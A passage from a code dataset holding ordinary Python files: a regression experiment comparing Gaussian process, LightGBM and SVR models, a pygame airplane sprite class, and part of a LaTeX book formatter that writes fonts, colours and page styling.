"line_number": 61, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 67, "usage_type": "call"}, {"api_name": "arcpy.MakeFeatureLayer_management", "line_number": 72, "usage_type": "call"}, {"api_name": "arcpy.SelectLayerByLocation_management", "line_number": 75, "usage_type": "call"}, {"api_name": "arcpy.GetCount_management", "line_number": 78, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 84, "usage_type": "call"}, {"api_name": "arcpy.CopyFeatures_management", "line_number": 89, "usage_type": "call"}, {"api_name": "arcpy.da.SearchCursor", "line_number": 98, "usage_type": "call"}, {"api_name": "arcpy.da", "line_number": 98, "usage_type": "attribute"}, {"api_name": "arcpy.FeatureSet", "line_number": 104, "usage_type": "call"}, {"api_name": "arcpy.SignInToPortal", "line_number": 109, "usage_type": "call"}, {"api_name": "arcpy.server.ManageMapServerCacheTiles", "line_number": 115, "usage_type": "call"}, {"api_name": "arcpy.server", "line_number": 115, "usage_type": "attribute"}, {"api_name": "time.perf_counter", "line_number": 118, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 130, "usage_type": "call"}, {"api_name": "sys.exc_info", "line_number": 138, "usage_type": "call"}]} +{"seq_id": "365768088", "text": "from sklearn.datasets import load_boston\nimport pandas as pd\nfrom GPy.models import GPRegression\nfrom GPy.kern import RBF\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_squared_error\nfrom sklearn.svm import SVR\nimport lightgbm as lgb\nimport numpy as np\nimport random\nfrom coding.ABO.AGPR import A_GPR\nimport matplotlib.pyplot as plt\n\nimport warnings\nwarnings.filterwarnings('ignore')\na_gpr = A_GPR()\n\ndata = pd.read_excel('../../dataset/cccp_data.xlsx')\n# ['AT', 'V', 'AP', 'RH', 'PE']\nx_data = data[['AT', 'V', 'AP', 'RH']].values\ny_data = data[['PE']].values\n\n# for index in range(np.shape(x_data)[0]):\n# scaler = StandardScaler()\n# x_data[index] = scaler.fit_transform(np.array(x_data[index])[0].reshape(-1, 1))\n#\nx_train, x_test, y_train, y_test = train_test_split(x_data, y_data, test_size=0.2)\n\nm, n = np.shape(x_train)\nprint('训练数据总量', m)\n\n_, x_train_l, _, y_train_l = train_test_split(x_train, y_train, test_size=60/m)\n\n# x_train_l, y_train_l = a_gpr.sample_point(x_train, y_train, iter=100)\n\nprint('低似真度数据样本量:', np.shape(x_train_l)[0])\n\n# 为 low fidelity 数据添加噪声\nmu = 0\nsigma = 30\nfor i in range(np.shape(x_train_l)[0]):\n y_train_l[i] = y_train_l[i] + random.gauss(0, sigma)\n # y_train_l[i] = y_train_l[i] * 1.1 - 10\n\nx_train_l = np.array(x_train_l, ndmin=2)\ny_train_l = np.reshape(y_train_l, (-1, 1))\n\nlist_mean_mse_gpr = []\nlist_mean_mse_lgb = []\nlist_mean_mse_svr = []\n\nlist_average = []\nplt.figure(figsize=(10, 5))\nax_1 = plt.subplot(121)\nax_2 = plt.subplot(122)\nleft = 100\nright = 201\ndist = 50\ninit_size = 2\nfor it in list(range(left, right, dist)):\n print('训练数据样本数目:', it)\n print('候选数据集大小:', np.shape(x_train))\n if it > np.shape(x_train)[0]:\n print('抽样样本点大于数据集本身')\n break\n list_mse_gpr = []\n list_mse_lgb = []\n list_mse_svr = []\n list_w = []\n\n for i in range(5):\n temp_iter = it - init_size\n # 初始化GP的训练数据\n single = 20\n hf_gp, list_w_hf, x_gp, y_gp = a_gpr.creat_gp_model(max_loop=temp_iter, x_init_l=x_train_l, y_init_l=y_train_l,init_num=init_size,\n n_start=1, n_single=single, x_conda=np.array(x_train, ndmin=2), y_conda=np.array(y_train).reshape(-1, 1)\n )\n list_w.append(list_w_hf)\n y_pre_gpr = 
[a_gpr.predict_mu_var(np.reshape(x_test[k], (1, -1)), hf_gp, re_var=False) for k in range(np.shape(x_test)[0])]\n\n x_train_m, y_train_m = a_gpr.sample_point(x_train, y_train, iter=it, is_init=True)\n # LightGBM model\n # _, x_train_m, _, y_train_m = train_test_split(x_train, y_train, test_size=(it / m))\n model_lgb = lgb.LGBMRegressor()\n model_lgb.fit(x_train_m, np.reshape(y_train_m, (1, -1))[0])\n y_pre_lgb = [model_lgb.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\n\n # SVM model\n x_train_r, y_train_r = a_gpr.sample_point(x_train, y_train, iter=it, is_init=True)\n # _, x_train_r, _, y_train_r = train_test_split(x_train, y_train, test_size=(it / m))\n\n model_svr = SVR()\n model_svr.fit(x_train_r, np.reshape(y_train_r, (1, -1))[0])\n y_pre_svr = [model_svr.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\n\n list_mse_gpr.append(mean_squared_error(y_test, y_pre_gpr))\n list_mse_lgb.append(mean_squared_error(y_test, y_pre_lgb))\n list_mse_svr.append(mean_squared_error(y_test, y_pre_svr))\n\n list_mean_mse_gpr.append(np.mean(list_mse_gpr))\n list_mean_mse_lgb.append(np.mean(list_mse_lgb))\n list_mean_mse_svr.append(np.mean(list_mse_svr))\n\n list_average = np.mean(list_w, axis=0)\n plt.sca(ax_1)\n plt.plot(list_average, lw=1.5, label='%s-st' % str(it))\n\n\nplt.axis('tight')\nplt.legend(loc=0)\nplt.ylabel('w_hf')\nplt.xlabel('iter')\nplt.title('boston_price')\n\nplt.sca(ax_2)\nplt.plot(list(range(left, right, dist)), list_mean_mse_lgb, lw=1.5, label='lgb_m')\nplt.plot(list(range(left, right, dist)), list_mean_mse_gpr, lw=1.5, label='gpr_m')\nplt.plot(list(range(left, right, dist)), list_mean_mse_svr, lw=1.5, label='svr_m')\nplt.axis('tight')\nplt.legend(loc=0) # legend position chosen automatically\nplt.ylabel('MSE')\nplt.xlabel('iter')\nplt.title('boston_price')\n\n\nprint('gpm', list_mean_mse_gpr)\nprint('lgb', list_mean_mse_lgb)\nprint('svr', list_mean_mse_svr)\n\nplt.show()\n\n'''\n\n\ndef pre_gp_mu_var(x_new, model, return_var=False):\n if return_var:\n mu, var = model.predict(x_new)\n return mu[0, 0], var[0, 0]\n else:\n mu, _ = model.predict(x_new)\n return mu[0, 0]\n\nx_train_r, y_train_r = a_gpr.sample_point(x_train, y_train, iter=200, is_init=True)\n\nk_rbf = RBF(input_dim=n, variance=0.5, lengthscale=1)\ngp_model = GPRegression(x_train_r, np.reshape(y_train_r, (-1, 1)), kernel=k_rbf)\ngp_model.optimize(messages=False)\n\nx_train_m, y_train_m = a_gpr.sample_point(x_train, y_train, iter=200, is_init=True)\n\nmodel_lgb = lgb.LGBMRegressor()\nmodel_lgb.fit(x_train_r, np.reshape(y_train_r, (1, -1))[0])\n\nx_train_p, y_train_p = a_gpr.sample_point(x_train_m, y_train_m, iter=200, is_init=True)\n\nmodel_svr = SVR()\nmodel_svr.fit(x_train_p, np.reshape(y_train_p, (1, -1))[0])\n\n\ny_pre_con = [pre_gp_mu_var(np.reshape(x_test[i], (1, -1)), gp_model) for i in range(np.shape(x_test)[0])]\ny_pre_lgb = [model_lgb.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\ny_pre_svr = [model_svr.predict(np.reshape(x_test[i], (1, -1))) for i in range(np.shape(x_test)[0])]\nprint(y_pre_con)\nprint('mse_con:', mean_squared_error(y_test, y_pre_con))\nprint('mse_lgb:', mean_squared_error(y_test, y_pre_lgb))\nprint('mse_svr:', mean_squared_error(y_test, y_pre_svr))\n\n\n\n'''\n", "sub_path": "coding/ABO/cccp.py", "file_name": "cccp.py", "file_ext": "py", "file_size_in_byte": 5868, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "warnings.filterwarnings", "line_number": 16, "usage_type": 
"call"}, {"api_name": "coding.ABO.AGPR.A_GPR", "line_number": 17, "usage_type": "call"}, {"api_name": "pandas.read_excel", "line_number": 19, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 30, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 33, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 42, "usage_type": "call"}, {"api_name": "random.gauss", "line_number": 43, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 46, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 56, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.shape", "line_number": 63, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 80, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 80, "usage_type": "call"}, {"api_name": "lightgbm.LGBMRegressor", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 87, "usage_type": "call"}, {"api_name": "sklearn.svm.SVR", "line_number": 93, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 94, "usage_type": "call"}, {"api_name": "numpy.reshape", "line_number": 95, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 95, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 97, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 98, "usage_type": "call"}, {"api_name": "sklearn.metrics.mean_squared_error", "line_number": 99, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 101, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 102, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 103, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 105, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 106, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 106, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 107, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 107, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 110, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 110, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 111, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 111, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": 
"name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.sca", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 119, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 119, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 131, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 131, "usage_type": "name"}]} +{"seq_id": "450527581", "text": "import pygame\n\nclass Airplane():\n #初始化飞机\n\n def __init__(self,screen):\n self.screen = screen\n\n #加载飞机图像并获取其外接矩形\n self.image = pygame.image.load(r'images\\airplane.bmp')\n self.rect = self.image.get_rect()\n self.screen_rect = screen.get_rect()\n\n #初始化飞机位置\n self.rect.centerx = self.screen_rect.centerx\n self.rect.bottom = self.screen_rect.bottom\n\n #初始化飞机移动标志\n self.m_right = False\n self.m_left = False\n\n #初始化飞机运动位置\n self.center = float(self.rect.centerx)\n\n def blitme(self,speed):\n #更新飞机运动信息\n if self.m_right and self.rect.right < self.screen_rect.right:\n self.center += speed\n if self.m_left and self.rect.left > 0:\n self.center -= speed\n self.rect.centerx = self.center\n \n #绘制飞机\n self.screen.blit(self.image,self.rect)\n\n def center_plane(self):\n #飞机复位\n\n self.image = pygame.image.load(r'images\\airplane.bmp')\n self.rect.centerx = self.screen_rect.centerx\n", "sub_path": "World War II - Air Force/airplane.py", "file_name": "airplane.py", "file_ext": "py", "file_size_in_byte": 1174, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "32", "api": [{"api_name": "pygame.image.load", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 39, "usage_type": "call"}, {"api_name": "pygame.image", "line_number": 39, "usage_type": "attribute"}]} +{"seq_id": "258167303", "text": " # coding=utf8\nfrom zope.interface import Interface, implements\nfrom zope.interface.verify import verifyObject\n\nfrom 
i_formatter import IFormatter\nimport settings\n\n\n## import re\n## _whitespace_regex = re.compile(\"[ \\t]+\")\n## def strip_ws(text):\n## \"\"\"\n## Latex is white space sensitive .. so strip any whitespace from the raw xml\n## (as xml is whitespace agnostic).\n\n## Leaves the line feeds in to keep the line numbers the same for debugging ??\n\n## \"\"\"\n## #return \" \".join(text.split())\n## return _whitespace_regex.sub(\" \", text)\n\n\ndef strip_ws(text):\n \"\"\"\n Latex is white space sensitive .. so strip any whitespace from the raw xml\n (as xml is whitespace agnostic).\n\n Collapses every run of whitespace (line feeds included) into a single space.\n\n \"\"\"\n return \" \".join(text.split())\n\n\n\n\nclass LatexFormatter:\n #implements(IFormatter)\n \n def __init__(self, latex_file):\n\n # open latex file pointer\n self.latex_file = latex_file\n \n # internal state\n self._drop_capped_first_letter_of_chapter = False\n\n # for tables\n self._number_of_columns_in_table = 0\n self._current_column_in_table = 0\n self._current_row_in_table = 0\n\n # for level tables\n self._current_row_in_level_table = 0\n\n #\n # configuration\n # \n return\n\n def verify(self):\n verifyObject(IFormatter, self)\n return\n\n def no_op(self, obj):\n \"\"\"We've got a lot of handlers that don't need to do anything.. do nothing once.\"\"\"\n pass\n\n \n def start_book(self, book):\n \n # must be a valid latex paper size\n if settings.paper_size == \"a4\":\n paper_size = \"a4paper\"\n elif settings.paper_size == \"letter\":\n paper_size = \"letterpaper\"\n else:\n raise Exception(\"Unknown paper size. Pick one of [a4, letter] in settings.py\")\n \n self.latex_file.write(\n \"\\\\documentclass[\" + paper_size + \",twocolumn,oneside]{book}\\n\" \n \"\\n\"\n \"\\\\usepackage{fancyhdr} % header control\\n\" \n \"\\\\usepackage{fancybox} % fancy boxes.. eg box outs\\n\" \n \"\\\\usepackage{graphicx} % for including images\\n\" \n \"\\\\usepackage{fontspec} % fine font control\\n\"\n \"\\\\usepackage{color} % color.. 
what can I say\\n\"\n \"\\\\usepackage{titlesec} % for fancy titles\\n\"\n \"\\\\usepackage{lettrine} % for drop capitals \\n\" \n\n \"\\\\usepackage{tabularx} % for tables \\n\" \n \"\\\\usepackage[table]{xcolor} % for tables with colour\\n\"\n \"\\\\usepackage{booktabs} % for tables\\n\"\n \"\\\\usepackage{calc} % for table width calculations\\n\"\n #\"\\\\usepackage{longtable} % for long tables (surprise!)\\n\"\n\n \"\\\\usepackage{wasysym} % for checked box\\n\"\n \n\n \"\\\\usepackage{xcolor} % for color aliases\\n\" \n \"\\\\usepackage{wallpaper} % for the paper background\\n\" \n \"\\\\usepackage{enumerate} % for roman numerals in enumerations\\n\" \n \"\\\\usepackage{lipsum} % for generating debug text\\n\"\n \"\\\\usepackage{wrapfig} % sidebar thingy\\n\"\n \"\\\\usepackage{makeidx} % for building the index\\n\"\n\n \n #\"\\\\usepackage{tcolorbox}\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}\\\\tcolorbox}\"\n ## \"%{\\\\endtcolorbox\\\\endwrapfigure}\\n\" \n ## \"\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}\\\\begin{tcolorbox}}\"\n ## \"%{\\\\end{tcolorbox}\\\\endwrapfigure}\\n\" \n ## \"\\n\"\n ## \"%\\\\newenvironment{wraptext}[1][r]\"\n ## \"%{\\\\wrapfigure{#1}{0.5\\\\textwidth}}\"\n ## \"%{\\\\endwrapfigure}\\n\"\n\n ## \"\\n\"\n ## \"\\\\newenvironment{rpgtable}{\\n\" \n ## \" \\\\centering\\n\"\n ## \" \\\\table\\n\"\n ## \"}\\n\"\n ## \"{\\n\"\n ## \" \\\\endtable\\n\"\n ## \"}\\n\"\n\n\n \"\\n\"\n \"\\n\"\n \"% fonts\\n\"\n \"\\\\newfontfamily{\\\\rim}[Scale=1.5]{Rat Infested Mailbox}\\n\"\n \"%\\\\newfontfamily{\\\\eng}[Scale=1.5]{English Gothic, 17th c.}\\n\"\n \"\\\\newfontfamily{\\\\dz}[Scale=2.5]{Deutsche Zierschrift}\\n\"\n \"\\\\newfontfamily{\\\\tkaqf}[Scale=2.5]{the King & Queen font}\\n\"\n \"\\\\newfontfamily{\\\\cloisterblack}{Cloister Black}\\n\"\n \"\\n\"\n \"\\\\newfontfamily{\\\\rpgtitlefont}[Scale=10.0]{Dogma}\\n\"\n \"\\\\newfontfamily{\\\\rpgchapterfont}[Scale=1.0]{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgsectionfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtableheaderfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgdropcapfont}[Scale=1.2]{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtitleauthorfont}{Cloister Black}\\n\"\n \"\\\\newfontfamily{\\\\rpgtitlesubtitlefont}{Cloister Black}\\n\"\n \"\\n\"\n \"% colours \\n\"\n \"\\\\definecolor{maroon}{RGB}{128,0,0}\\n\"\n \"\\\\definecolor{darkred}{RGB}{139,0,0}\\n\"\n \"\\\\definecolor{barnred}{RGB}{124,10,2}\\n\"\n \"\\\\definecolor{rosetaupe}{RGB}{144,93,93}\\n\"\n \"\\\\definecolor{rosewood}{RGB}{101,0,11}\\n\"\n \"\\\\definecolor{black}{RGB}{0,0,0}\\n\"\n \"\\n\"\n \"% colour aliases\\n\"\n \"\\\\colorlet{rpgtitlefontcolor}{black}\\n\"\n \"\\\\colorlet{rpgchapterfontcolor}{black}\\n\"\n \"\\\\colorlet{rpgsectionfontcolor}{rosewood}\\n\"\n \"\\\\colorlet{rpgtableheaderfontcolor}{black}\\n\"\n \"\\n\"\n \"\\n\"\n \"% spacing \\n\" \n \"\\\\newlength\\drop\\n\"\n \"\\\\drop = 0.01\\\\textheight % drop is a vspace 1/100th the page text height.\\n\"\n \"\\n\"\n \"% header formatting\\n\"\n \"\\\\titleformat{\\\\chapter}[hang]\\n\"\n \" {\\\\Huge\\\\bfseries\\\\rpgchapterfont\\\\color{rpgchapterfontcolor}}\\n\"\n \" {\\\\thechapter}{0.5em}{}\\n\"\n \"\\n\"\n \"\\\\titleformat{name=\\\\chapter,numberless}[hang]\\n\"\n \" {\\\\Huge\\\\bfseries\\\\rpgchapterfont\\\\color{rpgchapterfontcolor}}\\n\"\n \" {}{1em}{}\\n\"\n \"\\n\"\n \"\\\\titleformat{\\\\section}\\n\"\n \" 
{\\\\rpgsectionfont\\\\Large\\\\bfseries\\\\color{rpgsectionfontcolor}}\\n\"\n \" {\\\\thesection}{0.5em}{}\\n\"\n \"\\n\"\n \"\\\\newcommand{\\\\rpgtableheader}\\n\"\n \" {\\\\rpgtableheaderfont\\\\bfseries\\\\color{rpgtableheaderfontcolor}}\"\n \" {}\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n\n\n ## \"\\\\usepackage{rotating}\\n\"\n ## \"\\\\usepackage[first=-8,last=8]{lcg}\\n\"\n ## \"\\makeatletter\\n\"\n ## \"\\\\newcommand{\\\\globalrand}{\\\\rand\\\\global\\\\cr@nd\\\\cr@nd}\\n\"\n ## \"\\\\makeatother\\n\"\n ## \"\\\\newcommand{\\\\easteregg}[1]{%\\n\"\n ## \"\\\\expandafter\\\\let\\\\csname old\\\\string#1\\\\endcsname#1%\\n\"\n ## \"\\\\expandafter\\\\def\\\\expandafter#1\\\\expandafter##\\\\expandafter1\\\\expandafter{%\\n\"\n ## \"\\\\csname old\\\\string#1\\\\endcsname{\\\\protect\\\\globalrand\\\\protect\\\\turnbox{\\n\"\n ## \"\\\\value{rand}}{##1}\\\\protect\\\\phantom{##1}}}%\\n\"\n ## \"}\\n\"\n ## \"\\\\easteregg\\\\emph\\n\"\n \"\\n\" \n \"% the font for the body of the text\\n\"\n # \\fontspec[Mapping=tex-text, Ligatures={Common, Rare, Historic}]{Hoefler Text}\n # this works..\n #\"\\\\fontspec[Mapping=tex-text, Ligatures={Common, Rare}]{Cloister Black}\\n\"\n #\"\\\\setmainfont[Ligatures={Common, Rare}]{TeX Gyre Pagella}\\n\"\n\n #\"\\\\setmainfont[Ligatures={Common, Rare}]{TeX Gyre Pagella}\\n\"\n\n #\"\\\\defaultfontfeatures{Mapping=tex-text,Scale=MatchLowercase}\\n\"\n #\"\\\\setmainfont[Scale=0.95]{TeX Gyre Pagella}\\n\"\n #\"\\\\setmainfont[Scale=0.95]{Hoefler Text}\\n\"\n \"\\\\setmainfont[Scale=0.95]{Linux Libertine O}\\n\"\n \"\\\\setromanfont[Mapping=tex-text, Numbers=OldStyle, Contextuals=Swash, Ligatures=Historical]{Linux Libertine O}\\n\"\n #\"\\\\addfontfeature{Ligatures=Historical}\\n\"\n #\"\\\\addfontfeature{Ligatures=Historical}\\n\"\n #\"\\\\addfontfeature{Ligatures=Rare}\\n\"\n #\"\\\\addfontfeature{Contextuals=cswh}\\n\"\n \"\\\\setmonofont{TeX Gyre Pagella}\\n\" \n \"\\n\"\n \"% special bullet symbols\\n\"\n \"\\\\newcommand{\\\\rpgbullet}\\n\"\n \"{\\n\"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{WWDesigns}\\n\"\n \" \\\\large\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"0043\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\\\renewcommand{\\\\labelitemi}{\\\\rpgbullet}\\n\"\n \"\\n\"\n \"% special provenance symbol\\n\"\n \"\\\\newcommand{\\\\rpgprovenancesymbol}\\n\"\n \"{\\n\"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{WWDesigns}\\n\"\n \" \\\\Large\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"0041\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\n\"\n \"% scroll flourish divider symbol\\n\"\n \"\\\\newcommand{\\\\rpgdividersymbol}\\n\"\n \"{\\n\"\n #\" \"\n \" \\\\begingroup\\n\"\n \" \\\\fontspec{old retro labels tfb}\\n\"\n #\" \\\\fontsize{82pt}{14pt}\\\\selectfont\"\n \" \\\\Huge\\n\"\n \" \\\\selectfont\\n\"\n \" \\\\char\\\"006E\"\n \" \\\\endgroup\\n\"\n \"}\\n\"\n \"\\n\"\n \"\\n\"\n \"% combat symbol - a sword\\n\"\n \"\\\\newcommand{\\\\rpgcombatsymbol}{$\\\\dagger$}\\n\"\n \"\\n\"\n \"% training symbol\\n\"\n \"\\\\newcommand{\\\\rpgtrainingsymbol}{$\\\\otimes$}\\n\"\n \"\\n\"\n \"% learning symbols\\n\"\n \"\\\\newcommand{\\\\rpglearningsymbol}{$\\Psi$}\\n\" \n \"\\n\"\n \"% success symbols\\n\"\n \"\\\\newcommand{\\\\rpgsuccess}{\\\\CheckedBox}\\n\" \n \"\\n\"\n \"% fail symbols\\n\"\n \"\\\\newcommand{\\\\rpgfail}{\\\\XBox}\\n\" \n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"% the index \\n\"\n \"\\\\makeindex\\n\" \n \"\\n\"\n # start other evironments in newenvironments like this \n # put it after a section, not just before\n 
\"\\n\"\n \"\\\\newenvironment{playexample}{\\n\" \n \" \\\\centering\\n\"\n \" \\\\figure\\n\" \n #\" \\\\wrapfigure{o}{0.4\\\\textwidth}\\n\" \n \" \\\\hrule \\\\ \\n\"\n #\" \\\\rpgdividersymbol\\n\"\n #\" \\\\begin{center}XXXXX\\\\end{center} \\\\\\n\"\n #\" \\\\begin{center} \\\\hline \\\\end{center} \\\\\\n\"\n #\" {\\\\centering XXXXX }\\n\"\n #\" {\\\\centering x\\\\rpgdividersymbol }\\n\"\n \" \\\\small\\n\"\n \" \\\\cloisterblack\\n\"\n #\" \\\\tcolorbox\\n\" \n #\" \\\\centering\\n\"\n #\"{ \\\\begin{wrapfigure}{R}{0.5\\\\textwidth} \"\n #\" \\\\begin{minipage}{0.45\\\\textwidth} \"\n #\" \\\\begin{tcolorbox}\"\n \"}\\n\"\n \"{\\n\"\n #\" \\\\dag\\n\"\n #\" \\\\endtcolorbox\\n\"\n #\" \\\\end{tcolorbox} \"\n #\" \\\\end{minipage}\"\n #\" \\\\centering \\\\\\\\ \\\\rpgdividersymbol \\\\\\\\ \\n\"\n #\" \\\\makebox[\\textwidth]{\\rule{200cm}{0.4pt}} \n #\" \\\\makebox[\\\\linewidth]{\\\\centering \\\\rpgdividersymbol}\\n\"\n \" \\\\ \\\\hrule \\n\"\n #\" \\\\center \\\\rpgdividersymbol \\\\\\\\ \\\\endcenter \\n\"\n #\" \\\\endwrapfigure\\n\"\n \" \\\\endfigure\\n\"\n #\" \\\\leavevmode\\n\"\n \"}\\n\"\n \"\\n\"\n \"\\n\"\n \"\\n\"\n \"% the document! \\n\"\n \"\\\\begin{document}\\n\"\n \"\\n\")\n\n if settings.display_page_background:\n self.latex_file.write(\n \"\\n\"\n \"% use a background image\\n\"\n \"\\\\CenterWallPaper{1.0}{./resources/paper_\" + paper_size + \".jpg}\"\n \"\\n\\n\")\n \n return\n\n\n def end_book(self, book):\n self.latex_file.write(\"\\\\end{document}\\n\") \n return\n\n\n # \\printindex % Skriver ut index listan i dokumentet \n\n\n def start_appendix(self, appendix):\n self.latex_file.write(\"\\\\appendix\\n\"\n \"\\\\addcontentsline{toc}{chapter}{APPENDICES}\\n\")\n return\n end_appendix = no_op\n\n\n def start_ability(self, ability):\n title_element = ability.find(\"abilitytitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsubsection{%s}\\n\" % title) \n return\n\n def end_ability(self, ability):\n return\n\n def start_subsubsection(self, subsubsection):\n title_element = subsubsection.find(\"subsubsectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\subsubsection{%s}\\n\" % title) \n return\n\n #def end_subsubsection(self, subsubsection):\n # return\n end_subsubsection = no_op\n\n\n ## def start_ability_title(self, ability_title):\n ## return\n \n ## def end_ability_title(self, ability_title):\n ## return\n\n\n start_ability_group = no_op\n def end_ability_group(self, ability_group):\n #self.latex_file.write(\"%s\\n\" % strip_ws(ability_group.text))\n self.latex_file.write(\"%s\\n\" % strip_ws(ability_group.text))\n return\n\n start_ability_class = no_op\n def end_ability_class(self, ability_class):\n self.latex_file.write(\"%s\\n\" % strip_ws(ability_class.text))\n return\n\n start_action_points = no_op\n def end_action_points(self, action_points):\n self.latex_file.write(\"%s\\n\" % strip_ws(action_points.text))\n return\n\n\n def start_index(self, index):\n self.latex_file.write(\"\\\\clearpage\\n\") \n self.latex_file.write(\"\\\\addcontentsline{toc}{chapter}{Index}\\n\") \n self.latex_file.write(\"\\\\printindex\\n\") \n return\n end_index = no_op\n\n\n def start_section(self, section):\n title_element = section.find(\"sectiontitle\")\n if title_element is None:\n title = \"\"\n else:\n title = title_element.text\n\n self.latex_file.write(\"\\\\section{%s}\\n\" % title) \n return\n end_section = 
